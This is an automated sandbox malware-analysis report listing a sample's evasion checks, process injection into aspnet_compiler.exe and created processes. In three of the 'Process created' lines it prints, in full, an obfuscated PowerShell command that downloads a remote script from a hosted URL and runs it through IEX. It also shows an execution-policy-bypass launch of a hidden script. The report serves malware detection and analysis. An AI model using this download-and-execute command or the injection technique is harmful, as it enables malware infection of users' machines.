                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion:

                barindex
                Delayed program exit foundShow sources
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0040D2AE Sleep,ExitProcess,
                Source: C:\Windows\System32\wscript.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3406
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5553
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3700
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5140
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6756Thread sleep time: -14757395258967632s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6932Thread sleep count: 3700 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4928Thread sleep count: 5140 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6936Thread sleep time: -18446744073709540s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6776Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6772Thread sleep count: 57 > 30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeLast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeLast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00406176 FindFirstFileW,FindNextFileW,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0040A216 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_004452E9 FindFirstFileExA,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0040A431 FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_004077EE __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00407C57 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00414C1B FindFirstFileW,FindNextFileW,FindNextFileW,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00416F26 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00406930 SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: powershell.exe, 00000001.00000002.608901756.000001E84EC80000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(Msi!
                Source: powershell.exe, 00000001.00000002.609060985.000001E84F000000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                Source: powershell.exe, 00000001.00000002.609060985.000001E84F000000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                Source: powershell.exe, 00000001.00000002.609060985.000001E84F000000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                Source: powershell.exe, 00000001.00000002.609060985.000001E84F000000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0042EEF9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0040CEDF LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0043B629 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0044663E GetProcessHeap,
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0042F047 SetUnhandledExceptionFilter,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0042F49C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0042EEF9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00435F29 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                Yara detected Powershell download and executeShow sources
                Source: Yara matchFile source: 00000001.00000002.595371615.000001E834AF6000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.597766060.000001E836880000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6632, type: MEMORY
                Contains functionality to inject code into remote processesShow sources
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00413998 __EH_prolog,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,
                Injects a PE file into a foreign processesShow sources
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
                Writes to foreign memory regionsShow sources
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 452000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 469000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 46D000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 46E000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 46F000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 474000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: AC7008
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,Sleep,CloseHandle,OpenProcess, \svchost.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_004147AA StrToIntA,mouse_event,
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')|I`E`X
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file 'C:\Users\Public\ Microsoft.ps1'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')|I`E`X
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')|I`E`X
                Source: powershell.exe, 00000001.00000002.595778841.000001E834F40000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000010.00000002.595499968.00000000015C0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: powershell.exe, 00000001.00000002.595778841.000001E834F40000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000010.00000002.595499968.00000000015C0000.00000002.00000001.sdmpBinary or memory string: Progman
                Source: powershell.exe, 00000001.00000002.595778841.000001E834F40000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000010.00000002.595499968.00000000015C0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
                Source: powershell.exe, 00000001.00000002.595778841.000001E834F40000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000010.00000002.595499968.00000000015C0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0042F125 cpuid
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoA,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: EnumSystemLocalesW,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: EnumSystemLocalesW,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: EnumSystemLocalesW,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: EnumSystemLocalesW,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.2\Microsoft.PowerShell.PSReadline.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0041515E __EH_prolog,GdiplusStartup,CreateDirectoryW,Sleep,Sleep,GetLocalTime,Sleep,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0041657D GetComputerNameExW,GetUserNameW,
